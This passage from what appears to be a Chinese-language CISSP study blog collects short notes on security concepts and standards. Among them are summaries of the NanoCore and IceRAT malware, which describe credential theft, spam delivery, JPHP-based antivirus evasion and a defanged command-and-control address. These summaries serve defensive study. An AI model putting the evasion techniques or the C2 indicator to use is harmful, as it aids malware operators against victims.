  • 方法:惡意行為、攻擊指標 (IoA)、妥協指標 (IoC)、簽名、機器學習
  • 挑戰:高級持續威脅 (APT)、勒索軟件、惡意腳本等。

NDR

…是“網絡檢測和響應”。這是從傳統的網絡安全演變而來的,是 NTA(網絡流量分析)的一個子領域。它確保全面了解通過網絡的已知和未知威脅。這些解決方案通常提供集中的、基於機器的網絡流量分析和響應解決方案,包括高效的工作流程和自動化。網絡中的定位和機器學習的幫助提供了對網絡的全面洞察和分析,以識別和消除特別是橫向運動。

  • 範圍:網絡和設備間流量
  • 意圖:網絡流量的可見性/透明度、已知和未知威脅和橫向移動的檢測、警報和響應
  • 方法:攻擊指標 (IoA)、異常檢測、用戶行為、機器學習
  • 挑戰:高級攻擊和入侵、無惡意軟件攻擊

MDR

…代表’託管檢測和響應‘。這裡的重點不是技術,而是服務。作為 MDR 的一部分,客戶將他們的安全運營外包,並從全年、24 小時的可靠安全中受益。

安全提供商為他們的 MDR 客戶提供訪問他們專門從事網絡監控、事件分析和安全事件響應的安全分析師和工程師池的權限。

由於所需的技能和資源,該服務在SOC(安全運營中心)和 SIEM(安全信息和事件管理)領域尤其受歡迎。

  • 範圍:組織
  • 意向:安全專業知識外包、安全信息集中、高質量諮詢和安全合規
  • 方法:通過各種接口(API、日誌、DataLake 等)集成客戶系統
  • 挑戰:組織內缺乏安全技能/資源、xDR 工具的部署、日常安全的簡化:警報/事件的處理/最小化

探索耐多藥

XDR

…借助更強大的人工智能和自動化方法,擴展了 EDR 的潛力,因此“擴展檢測和響應”。

XDR 不僅集成端點,而且通過超越單向量點解決方案,將設備間流量以及用於分析和評估的應用程序包括在內,從而提供對企業網絡的可見性。

由此產生的海量數據庫/數據湖實現了基於機器的精確分析和高效檢測,主要是通過使用部署的組件對數據進行深度集成和關聯。

結合使用SIEM,可以進一步增強這種相關性和可見性。可以向指示和事件提供進一步的(元)數據,以促進惡意軟件的緩解(攻擊預防)和/或補救(攻擊後系統的恢復)。

  • 範圍:端點、主機、網絡和設備間流量、應用程序
  • 意圖:多個安全級別(網絡、端點、應用程序)的可見性/透明度、在橫向級別檢測已知和未知威脅,包括所有組件、整體監控和緩解、漏洞評估、警報和響應、事件的簡化和整合,以及活動和有針對性的反應
  • 方法:機器學習、攻擊指標 (IoA)、異常檢測、用戶行為、惡意行為、妥協指標
  • 挑戰:製造商的集成可能性/接口、透明度差距、部分 EDR 典型和 NDR 典型挑戰

資料來源:https://www.nomios.com/news-blog/edr-ndr-xdr-mdr/

分類
CISSP

最大可容忍停機時間(MTD)

https://ithelp.ithome.com.tw/upload/images/20211122/20132160CZhX8PXc30.jpg
-業務影響分析 (NIST)
支持產品或服務交付的業務流程通常取決於一個或多個資源。作為約束的業務流程的最大可容忍停機時間由業務人員決定,這推動了依賴資源恢復目標的設置。
https://ithelp.ithome.com.tw/upload/images/20211122/20132160Tmb44jT1qP.jpg
-常見的 BIA 術語

資料來源: Wentz Wu QOTD-20210906

分類
CISSP

什麼是假名化?

假名化 是歐盟通用數據保護條例 (GDPR)推動的一種數據管理程序。當數據被假名化時,可以指向主體身份的信息被“假名”或標識符替換。這可以防止數據專門指出用戶。

將假名數據與唯一的個人聯繫起來的唯一方法是將其與其他單獨存儲和保護的數據相結合。該系統允許組織分析個人數據並繼續為客戶提供服務,同時保護主體的隱私權。

在 GDPR 第 4(5) 條中,假名化過程被定義為“在不使用額外信息的情況下,個人數據無法再歸屬於特定數據主體的方式處理個人數據。” 

資料來源:https://www.trendmicro.com/vinfo/us/security/definition/pseudonymization

分類
CISSP

Bruce讀書方法

一本書, 要在1到3小時內看完第一次. 第一輪就要把書的背景, 結構及重點抓出來. 第一輪的快速看書, 就是要確定這本書值不值的繼續看下去. 值的看的書, 要看第二輪去詳讀, 第三輪去細讀. 經典等級的書不但值得收藏, 更值得看一輩子. 像心經, 短短的. 一下子就看完了, 但裏面的東西要一輩子去參.

大部份的書都是工具書, 都可以很快看完第一輪. 例如, CISSP的考試用書可以先快速看完第一輪(1~3小時), 然後就開始作題目, 再查書, 找資料, 看書, 及作題目. 如此反覆. 千萬別想等看完書再來作題目.

關於看書, 我很有心得. 學生時代, 我幾乎沒有完整看完過一本書. 因為我覺得”看完”很花時間, 而且大部份都看不懂, 所以不愛看書. 但後來, 我才知道看書是怎麼一回事: 有效看書的重點是好奇跟看懂. 不過, 好奇心不會自己產生. 我對一本書好奇, 是因為我有很多工作或長久以來的問題無法解決, 想要知道書上怎麼寫, 自然就會有好奇心. 若能找到書上的內容來解決工作上的問題, 好奇心被滿足了, 就自然覺得懂了. 因此, 看懂 = 好奇心被滿足了.

很好奇, 就會迫不急待想要快速找出書中的觀點, 所以速度就會快. 再搭配一些閱讀技巧, 很快就能找到答案. 關於閱讀技巧, 我最大的收穫就是: 只有閱讀技巧是沒有用的, 因為書的作者也要有好的寫作技巧. 若作者程度太差, 書就不會有好的結構. 還到這種寫得不好的書, 你有再好的閱讀技巧也沒有用. 這種不合格的書, 我就不會浪費時間去看了.

我上課的內容都有圖, model, 都很結構化. 其實也是這樣來的.

分類
Information Security

[專訪] 資訊安全治理(Governance) vs 資訊安全管理(Management): 為什麼需要ISO 27014?

隨著資料數位化,大數據、AI分析等技術相繼被各企業、政府單位採用,近年來企業內的資安單位,已從支援角色變成重要策略單位,單就國際標準ISO 27001資訊安全管理系統,逐漸無法完整凸顯企業競爭力。2013年發布的ISO 27014:2013資訊安全治理標準,將資訊安全「管理」進階至「治理」層級,將成為5G及雲端時代下重要的稽核標準。

從資安「管理」進階到資安「治理」

國際專業驗證機構,SGS驗證及優化事業群產品經理劉士弘,談到「過去組織通過ISO 27001驗證是魅力品質,但現在看來僅只是基本品質。」多數組織的資訊安全管理的範圍多著重於資訊單位,但若導入「治理(Governance)」的概念,需要考量的範圍與情境會豐富而且實際許多,例如除了一般常見的資訊相關風險外,就組織營運角度,也許更應該將財務、法律責任、客戶、合作夥伴、產品或服務研發、企業聲譽及形象、客戶及伙伴的信任、營收…等與組織營運策略方向直接相關的因素及風險納入考慮。

ISO 27014六大原則、五大流程

當層級提高到資安治理,資訊安全這件事不再只是由單一資訊單位或是少數單位來主導和參與,而是應該因應整個組織的策略、目標、方向與優先順序來與組織內各功能、各部門協同運作,而運作的方向須與組織營運方向一致,呈現的績效也須與組織營運績效連結且相符。

針對如何達成資訊安全治理,ISO 27014提出了「六大原則」以及「五大流程」。

六大原則包含:

  1. 建立全組織資訊安全(Establish organisation-wide information security)。
  2. 採用基於風險作法(Adopt a risk-based approach)。
  3. 設定投資決策方向(Set the direction of investment decisions)。CapEx和營運支出OpEx流程,以確保最佳化資訊安全投資以支援組織目標。
  4. 確保內、外部要求一致性(Ensure conformance with internal and external requirements)。
  5. 培養安全良好的環境(Foster a security-positive environment)。
  6. 審查相關營運成果績效(Review performance in relation to business outcomes)。 

欲達成上述六項原則, ISO 27014明定五項流程。

  1. 評估(Evaluate)。
  2. 指導(Direct)。
  3. 監視(Monitor)。
  4. 溝通(Communicate)。
  5. 保證(Assure)。 

劉士弘補充說道「政府2018年頒布的資通安全管理法,處處皆存在資安治理概念,例如:重視高階長官的參與度,要求組織投注一定比例的經費預算與人力配置。該法也將提升組織資安意識納入,強調橫向情資分享、縱向溝通、回報與監督,推行資安治理成熟度的評估等。」

資安觀念要站到前線

劉士弘說,ISO 27014主要涉及治理層面,管理階層愈高,代表跨產業的可能性愈大,整體來說,這項標準是比較通用的。但一些風險比較高的產業,或許可優先考慮滿足ISO 27014國際標準,包括高科技產業、醫療產業、金融產業、有機密資料的公務機關、關鍵基礎設施…等,劉士弘建議這些產業「要儘快將資安治理思維導入組織,以更宏觀地發現與因應可能的風險。」

席間SGS驗證及企業優化事業群部經理何星翰說,若數位智慧製造廠商參考遵循ISO 27014將資安「管理」拉高至「治理」層級後,許多IoT許多設備與應用可能發生的資安問題將可進行較為合適的處理方案。他說,目前部份廠商將智慧醫療、智慧家電系統賣給醫療院所或家庭後,由資訊單位單獨面對及管理IoT設備安全問題,銷售、設計製造或客服部門並未參與,若仍用傳統家電服務概念進行管理,而不是企業治理以涵蓋整體服務生命週期,恐發生數據外洩,隱私遭侵犯等問題。

因此,「資安觀念要站到前線」,相關業務與售後服務單位,需提升IoT安全意識,高階管理也要展現重視資安之承諾及決心,跨部門協調及整合,以整體強化資安成熟度。
 
何星翰說,2021年在資安上確有不少重要議題,如資安法修法,ISO 27001改版,「一旦改版,國內預估有800至900張證書,都需在兩、三年內完成轉版。」此外,金管會發佈金融資安行動方案,保險公司、證券業須導入資安管理系統及營運持續管理系統等,國防產業鏈是否能做到美國國防部要求的乾淨供應鏈網路,與資安相關人才需求及培訓,都是令人關注的資安議題。

資料來源:https://www.informationsecurity.com.tw/article/article_detail.aspx?aid=9023

分類
CISSP

虛擬機器監視器(Hypervisor)

https://ithelp.ithome.com.tw/upload/images/20211115/20132160JUYvH34qbW.png
-虛擬機和容器部署(來源:NIST SP 800-190)
虛擬機器監視器(Hypervisor)是虛擬機管理器,如上圖所示。來賓 VM 託管一個單獨的操作系統實例,而容器與其他容器共享操作系統內核。
內存邊界(Memory bounds)是一種常見的操作系統內存管理機製或計算機語言結構,用於限制進程的內存訪問。
https://ithelp.ithome.com.tw/upload/images/20211115/20132160Y8QODVqOW4.jpg
-進程的內存佈局(Memory Layout of a Process)
解釋器( interpreter)可以被視為限制腳本行為的沙箱(sandbox)。例如,瀏覽器(browser)是解釋器作為 JavaScript 沙箱的一個很好的例子。
https://ithelp.ithome.com.tw/upload/images/20211115/20132160lSALZX9CWo.jpg
-軟體運行環境

資料來源: Wentz Wu QOTD-20210903

分類
CISSP

工業控制系統(ICS)

以下是 NIST SP 800-82 R2 的摘要:
控制系統用於許多不同的工業部門和關鍵基礎設施,包括製造、分銷和運輸。
工業控制系統(ICS)是包含幾種類型的控制系統,包括一個通用術語,監督控制和數據採集(SCADA)系統,分佈式控制系統(DCS) ,和其他控制系統的配置,例如可編程邏輯控制器(PLC)常常在工業部門和關鍵基礎設施中發現。
ICS 用於控制地理上分散的資產,通常分散在數千平方公里的範圍內,包括分配系統,例如配水和廢水收集系統、農業灌溉系統、石油和天然氣管道、電網和鐵路運輸系統。
典型的 ICS 包含大量控制迴路、人機界面以及遠程診斷和維護工具,這些工具是使用分層網路架構上的一系列網絡協議構建的。
SCADA 系統用於控制分散的資產,其中集中式數據採集與控制同等重要。
DCS 用於控制同一地理位置內的生產系統。

參考
. NIST SP 800-82 R2
ENISA ICS SCADA
OT、ICS、SCADA 和 DCS 之間有什麼區別?
ICS/SCADA 網絡安全

資料來源: Wentz Wu QOTD-20210901

分類
Information Security

NanoCore 惡意軟件信息

概要

NanoCore 遠程訪問木馬 (RAT) 於 2013 年首次在地下論壇上出售時被發現。該惡意軟件具有多種功能,例如鍵盤記錄器、密碼竊取器,可以遠程將數據傳遞給惡意軟件操作員。它還能夠篡改和查看來自網絡攝像頭的鏡頭、屏幕鎖定、下載和盜竊文件等。

當前的 NanoCore RAT 正在通過利用社會工程的惡意垃圾郵件活動傳播,其中電子郵件包含虛假的銀行付款收據和報價請求。這些電子郵件還包含帶有 .img 或 .iso 擴展名的惡意附件。磁盤映像文件使用 .img 和 .iso 文件來存儲磁盤或光盤的原始轉儲。另一個版本的 NanoCore 也在利用特製 ZIP 文件的網絡釣魚活動中分發,該 ZIP 文件旨在繞過安全電子郵件網關。某些版本的 PowerArchiver、WinRar 和較舊的 7-Zip 可以提取惡意 ZIP 文件。被盜信息被發送到惡意軟件攻擊者的命令和控制 (C&C) 服務器。

此 RAT 收集以下數據並將其發送到其服務器:

  • 瀏覽器的用戶名和密碼
  • 文件傳輸協議 (FTP) 客戶端或文件管理器軟件存儲的帳戶信息
  • 流行郵件客戶端的電子郵件憑據

能力:

  • 信息竊取
  • 後門命令
  • 漏洞利用
  • 禁用使用能力

影響:

  • 危害系統安全 – 具有可以執行惡意命令的後門功能
  • 侵犯用戶隱私 – 收集用戶憑據、記錄擊鍵並竊取用戶信息

感染詳情:

樣本垃圾郵件 – 銀行付款收據附件垃圾郵件

MITRE ATT & CK 矩陣

資料來源:https://success.trendmicro.com/tw/solution/1122912-nanocore-malware-information

分類
Information Security

IceRAT 惡意軟件

什麼是 IceRAT 惡意軟件?

儘管它的名字,IceRAT 與其說是遠程訪問木馬,不如說是一個後門。它的主要功能是針對連鎖感染和額外的惡意軟件下載,而缺少傳統的 RAT 功能(例如命令執行)。自 2020 年 1 月被發現以來,IceRAT 成功地用大量信息竊取程序、密碼挖掘程序、鍵盤記錄程序和剪報程序感染了受害者。值得注意的是,惡意軟件主要通過垃圾郵件活動和木馬化“破解程序”進行傳播。例如,第一個檢測到的 IceRAT 版本通過包含用於 CryptoTab 瀏覽器的木馬軟件下載的惡意文件感染受害者。IceRAT 的主機和 C2 服務器 hxxp://malina1306.zzz(.)com.ua 位於西里爾文網站上,這可能表明 IceRAT 開發人員可能來自東歐或俄羅斯。

IceRAT 後門規避策略

IceRAT 的深入分析表明,它是有史以來第一個用 JPHP 編寫的惡意軟件,JPHP 是一種運行在 Java VM 上的 PHP 實現。因此,IceRAT 依賴於 .phb 文件而不是傳統的 Java .class 文件。由於 .php 文件通常不受 AV 引擎支持,因此這種特性允許威脅在 VirusTotal 上達到極低的檢測率。另一個有助於成功規避的不常見功能是 IceRAT 的架構。該實現高度分散,避免將所有功能放在一個文件中。特別是,IceRAT 惡意軟件使用多個文件分別執行每個信號功能。因此,萬一下載器組件被發現,它可能被認為是良性的,因為缺少惡意內容。

資料來源:https://socprime.com/blog/icerat-malware-detection-catch-me-if-you-can/

分類
CISSP

惡意程式(malware)

蠕蟲可以主動利用網路服務漏洞或被動使用群發郵件來傳播自身。但是,只有當用戶執行附加到電子郵件的惡意代碼時,它才會變為活動狀態。
. 病毒不會自我複制;它可以被操作系統(例如編譯病毒)或應用程序(例如巨集病毒)加載和執行。
. “惡意移動代碼是具有惡意意圖的軟體,從遠程主機傳輸到本地主機,然後在本地主機上執行,通常沒有用戶的明確指令。惡意移動代碼的流行語言包括 Java、ActiveX、JavaScript 和 VBScript。” (NIST SP 800-83 R1)
惡意移動代碼不涉及移動應用程序,並且在沒有用戶明確指示的情況下穿越移動設備。
. 特洛伊木馬不會自我複制。這是一個自成一體的程式,似乎是良性的,但實際上有一個隱藏的惡意目的。

參考
. NIST SP 800-83 R1

資料來源: Wentz Wu QOTD-20210831

分類
Cissp-WentzWu

治理

治理就是管理, 它只是強調經營高層(董事會及高階主管)的管理作為. 皇帝只會用”朕”, 不會用”我”這個字. 只要是高階主管的管理作為, 就可以說是治理.

如果你是CISO, 那就可以說是在治理資安. 但本質就是在管理資安而已.

CISSP只是一個資格, 要知道治理的意義. 但不是取得CISSP就會當上CISO或成為經營高層的一員. 所以CISSP可能懂治理是什麼, 但可能沒有實權去治理資安.

經營高層如何治理資安?

1. 想東想西: 戰略管理

2. 出一張嘴: 政策指示

治理的目標就是創造價值, 實現組織的使命與願景. 白話文就是: 作生意賺錢, 永續經營, 善盡社會責任.

然後, 經營高層就要晝大餅(願景), 想辦法(戰略)帶大家(領導)往目標邁進, 以實現願景.

簡單說, 經營高層要把公司管好(治理好), 才能賺錢, 實現使命與願景.

經營高層如何管好(治理好)公司? 要有一套辦法(戰略), 要叫人家去作(政策)

這些都是同一回事, 也是很簡單的道理. 只是簡單的東西被複雜化而已.

分類
CISSP

電路級(Circuit-level)授權策略不是常見的服務網格授權策略類型

以下是 NIST SP 800-204B 的摘錄:
可以通過配置身份驗證和存取控制策略來實施對微服務的細粒度存取控制。這些策略在服務網格的控制平面中定義,映射到低級配置,並推送到構成服務網格數據平面的邊車代理(sidecar proxies)中。
授權策略,就像它們的身份驗證對應物一樣,可以在服務級別和最終用戶級別指定。此外,授權策略是基於存取控制模型的構造來表達的,並且可能會根據應用程序和企業級指令的性質而有所不同。此外,存取控制數據的位置可能因企業中的身份和存取管理基礎設施而異。這些變化導致以下變量:
● 兩個授權級別——服務級別和最終用戶級別
● 用於表達授權策略的存取控制模型
● 存取控制數據在集中或外部授權服務器中的位置或作為頭數據攜帶
服務網格中支持的存取控制使用抽象來分組一個或多個策略組件(在第 4.5.1 節中描述),用於指定服務級別或最終用戶級別的授權策略。由於基於微服務的應用程序被實現為 API(例如,表現層狀態轉換(REST)ful API),使用鍵/值對描述的授權策略組件將具有與 API 相關的屬性,包括相關的網絡協議。授權策略的類型有:
● 服務級授權策略
● 最終用戶級授權策略
● 基於模型的授權策略

參考
. NIST SP 800-204B

資料來源: Wentz Wu QOTD-20210830

分類
CISSP

表現層狀態轉換REST

表現層狀態轉換英語Representational State Transfer縮寫REST)是Roy Thomas Fielding博士於2000年在他的博士論文[1]中提出來的一種全球資訊網軟體架構風格,目的是便於不同軟體/程式在網路(例如網際網路)中互相傳遞資訊。表現層狀態轉換是根基於超文字傳輸協定(HTTP)之上而確定的一組約束和屬性,是一種設計提供全球資訊網絡服務的軟體構建風格。符合或相容於這種架構風格(簡稱為 REST 或 RESTful)的網路服務,允許使用者端發出以統一資源標識符存取和操作網路資源的請求,而與預先定義好的無狀態操作集一致化。因此表現層狀態轉換提供了在網際網路的計算系統之間,彼此資源可互動使用的協作性質(interoperability)。相對於其它種類的網路服務,例如SOAP服務,則是以本身所定義的操作集,來存取網路上的資源。

目前在三種主流的Web服務實現方案中,因為REST模式與複雜的SOAPXML-RPC相比更加簡潔,越來越多的Web服務開始採用REST風格設計和實現。例如,Amazon.com提供接近REST風格的Web服務執行圖書查詢;雅虎提供的Web服務也是REST風格的。

資料來源:https://zh.wikipedia.org/wiki/%E8%A1%A8%E7%8E%B0%E5%B1%82%E7%8A%B6%E6%80%81%E8%BD%AC%E6%8D%A2

分類
CISSP

XACML

XACML代表“可擴展訪問控制標記語言”。該標准定義了一種聲明性細粒度、基於屬性的訪問控制策略語言、[2]架構和描述如何根據策略中定義的規則評估訪問請求的處理模型。

作為已發布的標準規範,XACML 的目標之一是促進多個供應商的訪問控制實現之間的通用術語和互操作性。XACML 主要是一種基於屬性的訪問控制系統 (ABAC),也稱為基於策略的訪問控制 (PBAC) 系統,其中與用戶或操作或資源相關聯的屬性(數據位)被輸入到決定是否給定用戶可以以特定方式訪問給定資源。基於角色的訪問控制(RBAC) 也可以作為 ABAC 的特化在 XACML 中實現。

XACML 模型支持並鼓勵將執行 (PEP) 與決策 (PDP) 與授權的管理/定義 (PAP) 分離。當訪問決策在應用程序中硬編碼(或基於本地機器用戶 ID 和訪問控制列表(ACL))時,很難在管理策略發生變化時更新決策標準,並且很難實現對訪問決策的可見性或審計。授權到位。當客戶端與訪問決策分離時,授權策略可以即時更新並立即影響所有客戶端。

資料來源:https://en.wikipedia.org/wiki/XACML

分類
CISA

X/Open XA

在計算技術上,XA規範開放群組關於分布式事務處理 (DTP)的規範。規範描述了全局的事務管理器與局部的資源管理器之間的接口。XA規範的目的是允許多個資源(如資料庫,應用伺服器,消息隊列,等等)在同一事務中訪問,這樣可以使ACID屬性跨越應用程式而保持有效。XA使用兩階段提交來保證所有資源同時提交或回滾任何特定的事務。

XA規範描述了資源管理器要支持事務性訪問所必需做的事情。遵守該規範的資源管理器被稱為XA compliant

資料來源:https://zh.wikipedia.org/wiki/X/Open_XA

分類
CISSP

Confusion and diffusion混淆與擴散

密碼學當中,混淆(confusion)與擴散(diffusion)是設計密碼學演算法的兩種主要方法。這樣的定義最早出現在克勞德·夏農1945年的論文《密碼學的數學理論》當中[1]

在克勞德·夏農的定義之中,混淆主要是用來使密文和對稱式加密方法中金鑰的關係變得盡可能的複雜;而擴散則主要是用來使用明文和密文關的關係變得盡可能的複雜,明文中任何一點小更動都會使得密文有很大的差異。 混亂用於掩蓋明文與密文之間的關係。這可以挫敗通過研究密文以取得冗餘度和統計模式的企圖。做到這一點最容易的方法是「代替」。 擴散通過將明文冗餘度分散到密文中使之分散開來。即將單個明文或金鑰位的影響儘可能擴大到更多的密文中去。產生擴散最簡單的方法是換位(置換)。

分類
CISSP

L2TP最不可能用於加密 VPN 連接中的數據

https://ithelp.ithome.com.tw/upload/images/20211105/20132160DIGEKxJZrk.jpg
-VPN 訪問(來源:ActForNet)
VPN 是一種通過隧道連接節點的虛擬網路。L2F、PPTP 和 L2TP 是早期的隧道協議。通過 VPN 隧道傳輸的數據通常由安全協議加密,例如 SSL/TLS、IPsec、SSH、MPPE。
L2F 不提供加密。PPTP 使用 MPPE(Microsoft 點對點加密)加密數據。L2TP 本身建立隧道但不加密數據;它通常通過 IPsec 強制保密。
Secure Shell (SSH)是一種加密網路協議,用於在不安全的網路上安全地運行網路服務。” (維基百科)它可用於建立 SSH VPN 或與其他隧道協議一起使用。
https://ithelp.ithome.com.tw/upload/images/20211105/2013216035Xn0ZWeQh.png
-SSH隧道

參考
NIST SP 800-77 R1
NIST SP 800-113
如何使用 SSH 配置端口轉發
如何找到SSH隧道

資料來源: Wentz Wu QOTD-20210827

分類
CISSP

IEEE 802.1X

IEEE 802.1XIEEE制定關於使用者接入網路的認證標準(注意:此處X是大寫[1]),全稱是「基於埠的網路接入控制」,屬於IEEE 802.1網路協定組的一部分。於2001年標準化,之後為了配合無線網路的接入進行修訂改版,於2004年完成。它為想要連接到LANWLAN的裝置提供了一種認證機制。

IEEE 802.1X協定在使用者接入網路(可以是乙太網路802.3或者WLAN網)之前執行,執行於網路中的資料鏈路層EAP協定RADIUS協定。

IEEE 802.1X定義了在IEEE 802上執行擴充認證協定(EAP,即”EAP over LAN”或EAPOL[2])的封裝方式[3][4]。EAPOL最初被定義在802.1X-2001,設計物件為IEEE 802.3乙太網路,但是後來為了適應其他IEEE 802 LAN技術,如IEEE 802.11無線和光纖分散式資料介面(FDDI)(ISO 9314-2),在802.1X-2004中又做了澄清[5]。為了與IEEE 802.1AE (「MACsec」)和IEEE 802.1AR (Secure Device Identity, DevID)一起使用,EAPOL協定在802.1X-2010中還進行了修改[6][7],以支援服務辨識和在本地LAN段上的可選對等加密。

概述

EAP資料首先被封裝在EAPOL影格中,傳輸於申請者(Supplicant)和驗證者(Authenticator)之間。隨後又封裝在RADIUS或Diameter,傳輸於驗證者和驗證伺服器(Authentication server)之間。

802.1X驗證涉及到三個部分:申請者、驗證者和驗證伺服器。申請者是一個需要連接到LAN/WAN的客戶端裝置(如可攜式機),同時也可以指執行在客戶端上,提供憑據給驗證者的軟體。驗證者是一個網路裝置,如乙太網路交換機或無線存取點。驗證伺服器通常是一個執行著支援RADIUSEAP協定的主機。 驗證者就像是一個受保護網路的警衛。申請者(如客戶端裝置)不允許通過驗證者存取到受保護一側的網路,直到申請者的身分被驗證和授權。這就像是允許進入一個國家之前要在機場的入境處提供一個有效的簽證一樣。使用802.1X基於埠的驗證,申請者向驗證者提供憑據,如使用者名稱/密碼或者數位憑證,驗證者將憑據轉發給驗證伺服器來進行驗證。如果驗證伺服器認為憑據有效,則申請者(客戶端裝置)就被允許存取被保護側網路的資源[8]

資料來源:https://zh.wikipedia.org/wiki/IEEE_802.1X

分類
CISSP

OWASP Top 10 2021 介紹

Top 10 for 2021 有什麼新的變化?

這次在 OWASP Top 10 for 2021 有三個全新的分類,有四個分類有做名稱和範圍的修正,並有將一些類別做合併。

Mapping of the relationship between the Top 10 2017 and the new Top 10 2021

A01:2021-權限控制失效 從第五名移上來; 94% 被測試的應用程式都有驗測到某種類別 權限控制失效的問題。在權限控制失效這個類別中被對應到的 34 個 CWEs 在驗測資料中出現 的次數都高於其他的弱點類別。

A02:2021-加密機制失效 提升一名到第二名,在之前為 敏感資料外曝,在此定義下比 較類似於一個廣泛的問題而非根本原因。在此重新定義並將問題核心定義在加密機制的失敗,並 因此造成敏感性資料外洩或是系統被破壞。

A03:2021-注入式攻擊 下滑到第三名。94% 被測試的應用程式都有驗測到某種類別 注入式攻擊的問題。在注入式攻擊這個類別中被對應到的 33 個 CWEs 在驗測資料中出現 的次數為弱點問題的第二高。跨站腳本攻擊現在在新版本屬於這個類別。

A04:2021-不安全設計 這是 2021 年版本的新類別,並特別針注在與設計相關的缺失。 如果我們真的希望讓整個產業”向左移動”*註一*,那我們必須進一步的往威脅建模,安全設計 模塊的觀念,和安全參考架構前進。

*註一: Move Left 於英文原文中代表在軟體開發及交付過程中,在早期找出及處理相關問題, 同 Shift Left Testing。*

A05:2021-安全設定缺陷 從上一版本的第六名移動上來。90% 被測試的應用程式都有驗測 到某種類別的安全設定缺陷。在更多的軟體往更高度和有彈性的設定移動,我們並不意外這個類別 的問題往上移動。在前版本中的 XML 外部實體注入攻擊 (XML External Entities)現在屬 於這個類別。

A06:2021-危險或過舊的元件 在之前標題為 使用有已知弱點的元件。在本次版本中於業 界問卷中排名第二,但也有足夠的統計資料讓它可以進入 Top 10。這個類別從 2017 版本的第 九名爬升到第六,也是我們持續掙扎做測試和評估風險的類別。這也是唯一一個沒有任何 CVE 能被 對應到 CWE 內的類別,所以預設的威脅及影響權重在這類別的分數上被預設為 5.0。

A07:2021-認證及驗證機制失效 在之前標題為 錯誤的認證機制。在本次版本中油第二名 下滑至此,並同時包含了將認證相關缺失的 CWE 包含在內。這個類別仍是 Top 10 不可缺少的 一環,但同時也有發現現在標準化的架構有協助降低次風險發生機率。

A08:2021-軟體及資料完整性失效 這是 2021 年版本全新的類別,並在軟體更新,機敏及 重要資料,和 CI/CD 管道中並沒有做完整性的確認為前提做假設並進行評估。在評估中影響權重 最高分的 CVE/CVSS 資料都與這類別中的 10 個 CWE 對應到。2017 年版本中不安全的反序列 化現在被合併至此類別。

A09:2021-資安記錄及監控失效 在之前為不完整的紀錄及監控並納入在業界問卷中在本次 列名為第三名並從之前的第十名上移。這個類別將擴充去納入更多相關的缺失,但這也是相當難去驗 證,並沒有相當多的 CVE/CVSS 資料可以佐證。但是在這個類別中的缺失會直接影響到整體安全的 可視性,事件告警及鑑識。

A10:2021-伺服端請求偽造 這個類別是在業界問卷排名第一名,並在此版本內納入。由資料 顯示此問題有較低被驗測次數和範圍,但有高於平均的威脅及影響權重比率。這個類別的出現也是 因為業界專家重複申明這類別的問題相當重要,即使在本次資料中並沒有足夠的資料去顯示這個 問題。

資料來源:https://owasp.org/Top10/zh_TW/

分類
CISSP

CSMA/CD 與 CSMA/CA 之間的差異

CSMA/CD(載波偵測多重存取/碰撞偵測)運作過程如下:

  • 訊號採用廣播的方式傳送(所以才會發生碰撞)
  • 當節點要發送訊號時,會先偵測通道是否有其他節點正在使用(carrier sense)
  • 當通道沒有被其他節點使用時,就傳送封包
  • 封包傳送之後立即檢查是否發生碰撞(carrier detection),若是發生碰撞則對通道發出高頻訊號高知其他節點已經發生碰撞
  • 碰撞後隨機等待一段時間重新發送封包
  • 嘗試 15 次都失敗的話則告知上層 Timeout

CSMA/CA(載波偵測多重存取/碰撞避免)運作過程如下:

  • 訊號採用廣播的方式傳送(非常容易受到無線電波干擾)
  • 當節點要發送訊號時偵測頻道是否空閒
  • 若是空閒則等待 IFS, Interval Frame Space 時間後再次偵測頻道是否空閒
  • 若是空閒則發送封包,反之重新進入等待頻道空閒(隨機等待時間)
  • 發送 RTS 之後必須在限定時間內收到來至目的端的 CTS 訊號
  • 當失敗 32 次之後通知上層 Timeout

資料來源:https://blog.toright.com/posts/1243/csmacd-%E8%88%87-csmaca-%E4%B9%8B%E9%96%93%E7%9A%84%E5%B7%AE%E7%95%B0.html

分類
CISSP

密碼是支持單因素身份驗證的最佳機制

https://ithelp.ithome.com.tw/upload/images/20211102/201321608ckrqS6xtu.jpg
-數字身份模型(來源:NIST SP 800 63-3)
“秘密”是用於驗證主體身份的最關鍵元素。一個認證是秘密的載體,例如,密碼,在你的大腦記憶(你知道的),私有密鑰儲存在令牌設備(你有什麼),或生物識別嵌入在你的身體(你是)。
 生物識別(您的身份)不足以構成秘密,因為它可能會暴露給公眾。例如,您的自拍可能會讓您容易受到黑客的攻擊。NIST SP 800-63 系列指南“僅允許在與物理身份驗證器強綁定時使用生物識別技術進行身份驗證。”
 用於基於知識的身份驗證的認知密碼是您知道的一種形式,但它們也不是秘密。顧名思義,它們就是知識。
 基於位置的身份驗證(您所在的某個地方)不是身份驗證因素。
以下是 NIST SP 800-63-3 的摘錄:
身份驗證系統的經典範例將三個因素確定為身份驗證的基石:
• 您知道的東西(例如,密碼)。
• 您擁有的東西(例如,ID 徽章或加密密鑰)。
• 您的身份(例如,指紋或其他生物特徵數據)。

MFA是指使用以上因素中的一種以上。
身份驗證系統的強度在很大程度上取決於系統所包含的因素的數量——採用的因素越多,身份驗證系統就越強大。就這些準則而言,使用兩個因素足以滿足最高的安全要求。
如第 5.1 節所述,RP 或驗證者可以使用其他類型的信息(例如位置數據或設備身份)來評估所聲明身份中的風險,但它們不被視為身份驗證因素。
在數字認證申請人擁有和控制的一個或多個鑑定人已註冊與CSP和用於證明申請人的身份。身份驗證器包含索賠人可以用來證明他或她是有效訂戶的秘密,索賠人通過證明他或她擁有和控制一個或多個身份驗證器來對網路上的系統或應用程序進行身份驗證。
在本卷中,身份驗證器始終包含一個秘密。一些經典的身份驗證因素並不直接適用於數字身份驗證。例如,物理駕駛執照是您擁有的東西,並且在向人類(例如保安人員)進行身份驗證時可能很有用,但它本身並不是數字身份驗證的身份驗證器。
歸類為您所知的身份驗證因素也不一定是秘密。 基於知識的身份驗證,其中提示申請人回答可能只有申請人知道的問題,也不構成數字身份驗證可接受的秘密。一個生物特徵也並不能構成一個秘密。因此,這些指南僅允許在與物理身份驗證器強綁定時使用生物識別技術進行身份驗證。
來源:NIST SP 800-63-3

參考
NIST SP 800-63-3
你的自拍可能會讓你容易受到黑客攻擊
化妝和假手指——領先於網絡騙子
照片中隱藏的指紋

資料來源: Wentz Wu QOTD-20210825

分類
Information Security

帳號填充(Credential Stuffing)

密碼猜測攻擊手法演進的4種型態

